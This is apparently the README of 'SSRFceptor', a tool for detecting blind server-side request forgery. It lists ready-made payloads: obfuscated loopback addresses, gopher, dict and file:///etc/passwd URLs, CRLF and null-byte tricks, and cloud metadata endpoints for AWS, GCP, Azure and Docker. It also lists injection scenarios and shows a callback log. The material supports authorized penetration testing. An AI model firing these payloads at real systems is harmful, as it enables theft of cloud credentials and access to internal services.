████ ███ ████ ███ ███ █ █
█░░░█ █ ░░█ █░░░█ █░░█ ░░█ █ █ ░
████░░█░ ░█░█░░░█░ █░░█░ ░█░ █ ░ ░
█░░░█ █░░ █░█░░ █░█ █░░█░░ █░░█ █ ░
████░░ ███ ░████ ░░██ ░░ ███ ░█ ░ █
░░░░ ░ ░░░ ░░░░░ ░ ░░ ░ ░░░ ░░ ░ ░
░░░░ ░░░ ░░░░ ░░ ░░░ ░ ░
Blind SSRF Detector · Webhook Callbacks · Out-of-Band Payloads
Detect server-side request forgery using OOB HTTP/DNS callbacks
SSRFceptor is a blind SSRF detection tool for bug bounty hunters and pentesters. It spins up a local webhook listener and generates 30+ out-of-band payloads designed to trigger server-side requests back to your callback server — proving SSRF even when the response isn't visible.
- Webhook callback server — local HTTP listener that captures all inbound SSRF requests
- 30+ OOB payloads — IP obfuscation, protocol smuggling, parser tricks, DNS rebinding
- Cloud metadata payloads — AWS, GCP, Azure, Alibaba, Kubernetes, Docker
- Attack scenario guide — 10 common SSRF injection vectors with copy-paste payloads
- Free webhook services — Integrates with Interactsh, webhook.site, requestbin, hookbin
- Callback logging — timestamps, source IP, headers, request body captured
- JSON export — full results for reports and CI/CD pipelines
git clone https://github.com/b0dj0x/ssrfceptor.git
cd ssrfceptor
pip install -r requirements.txtpython3 ssrfceptor.py serve # Listen on 127.0.0.1:9999
python3 ssrfceptor.py serve -p 8888 -b 0.0.0.0 # All interfaces, custom portpython3 ssrfceptor.py payloads # Payloads for localhost
python3 ssrfceptor.py payloads -H 1.2.3.4 # Payloads for your VPS
python3 ssrfceptor.py payloads -c # Include cloud metadata targetspython3 ssrfceptor.py scenarios # 10 SSRF injection vectors
python3 ssrfceptor.py webhooks # Free webhook services| Payload | Description |
|---|---|
http://0x7f000001:9999/TOKEN |
Hex-encoded IP |
http://2130706433:9999/TOKEN |
Decimal-encoded IP |
http://[::1]:9999/TOKEN |
IPv6 loopback |
http://[0000:0000:...:0001]:9999/TOKEN |
Full IPv6 |
http://1.0.0.127:9999/TOKEN |
Reversed IP octets |
http://0127.0000.0000.0001:9999/TOKEN |
Zero-padded IP |
http://①②⑦.⓪.⓪.①:9999/TOKEN |
Unicode IP digits |
| Payload | Description |
|---|---|
gopher://127.0.0.1:9999/_TOKEN |
Gopher protocol (Redis, SMTP, etc.) |
dict://127.0.0.1:9999/TOKEN |
Dict protocol (LDAP, Redis INFO) |
file:///etc/passwd |
Local file read |
| Payload | Description |
|---|---|
http://127.0.0.1%40:9999/TOKEN |
URL-encoded @ |
http://127.0.0.1\:9999/TOKEN |
Backslash trick |
http://127.0.0.1%09:9999/TOKEN |
Tab injection |
http://127.0.0.1%0d%0aHost:... |
CRLF injection |
http://127.0.0.1%00:9999/TOKEN |
Null byte truncation |
http://LoCaLhOsT:9999/TOKEN |
Case variation |
| Payload | Description |
|---|---|
<meta http-equiv="refresh" content="0;url=..."> |
Meta refresh redirect |
<img src="http://..." /> |
Image tag SSRF |
| Cloud | Metadata Endpoint |
|---|---|
| AWS | http://169.254.169.254/latest/meta-data/ |
| GCP | http://metadata.google.internal/computeMetadata/v1/ |
| Azure | http://169.254.169.254/metadata/instance |
| Alibaba | http://100.100.100.200/latest/meta-data/ |
| Kubernetes | https://kubernetes.default.svc/ |
| Docker | http://unix:/var/run/docker.sock:/containers/json |
Webhook server running on 127.0.0.1:9999
Callback URL: http://127.0.0.1:9999/<token>
┌─── SSRF CALLBACK DETECTED ───
│ Time: 2026-07-26 19:48:54 UTC
│ Source: 127.0.0.1
│ Method: GET /test-token-12345
│ Payload: Basic OOB
│ Token: test-token-12345
│ Host: 127.0.0.1:9999
│ UA: curl/8.19.0
└───────────────────────────────
| # | Scenario | Description |
|---|---|---|
| 1 | URL Import | RSS readers, PDF generators, link previews |
| 2 | Webhook URL | Slack/Discord/GitHub webhook fields |
| 3 | PDF Generation | HTML-to-PDF services fetch resources |
| 4 | Image Proxy | App proxies images through server |
| 5 | File Upload | SVG/HTML with embedded URLs |
| 6 | SSO / OAuth | redirect_uri manipulation |
| 7 | Email HTML | Email templates with img tags |
| 8 | Webhook integrations | Third-party webhook URL fields |
| 9 | API Gateway | GraphQL/REST with URL fields |
| 10 | CI/CD Pipeline | Build scripts with user-provided URLs |
- Bug Bounty — Prove blind SSRF for higher severity/payouts
- Pentesting — Audit web applications for SSRF vulnerabilities
- Cloud security — Test for metadata endpoint exposure
- CTF — Solve SSRF-related challenges
- Code review — Validate SSRF mitigations work
Results are auto-exported to JSON on Ctrl+C, or specify output:
python3 ssrfceptor.py serve --export results.jsonThis tool is for authorized security testing and educational purposes only. Unauthorized access to computer systems is illegal.
b0dj0x — Bug Bounty Hunter · OSINT Researcher · Red Team
Made with by b0dj0x